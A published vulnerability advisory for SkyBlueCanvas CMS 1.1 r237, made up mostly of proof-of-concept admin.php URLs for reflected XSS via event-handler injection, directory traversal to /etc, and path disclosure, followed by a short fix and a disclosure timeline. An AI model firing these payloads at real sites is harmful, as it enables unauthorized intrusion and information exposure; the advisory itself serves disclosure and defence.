SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities
Version Affected: 1.1 r237 (newest version: 1.1 r246) Info: SkyBlueCanvas Lightweight CMS is an open source, free content management system written in php and built specifically for small web sites. The entire site you are viewing is a demonstration of the SkyBlueCanvas lightweight CMS. SkyBlueCanvas is custom-built for those instances when more robust systems like Joomla, WordPress and Drupal are too much horsepower. Credits: InterN0T External Links: http://www.skybluecanvas.com -:: The Advisory ::- Vulnerable Function / ID Calls: mgroup, mgr, objtype, id & dir. Cross Site Scripting: (requires administrator access - will not survive a login screen) http://[HOST]/skybluecanvas/admin.php?mgroup="; onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2 http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr="; onmouseover=alert(0) > &com=manager Impossible XSS: (XML errors or hidden tags preventing use of event handlers.) http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtype=";>XSS http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=editpage&id="; onfocus=alert(0) > http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS Path Content Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/ -- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/ --=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw. Path Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=move&id=' http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=rename&id=' -:: Solution ::- Filter event handlers out from function calls. Conclusion: Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable. Reference: http://forum.intern0t.net/intern0t-advisories/1120-intern0t-skybluecanvas-1-1-r237-multiple-vulnerabilities.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe
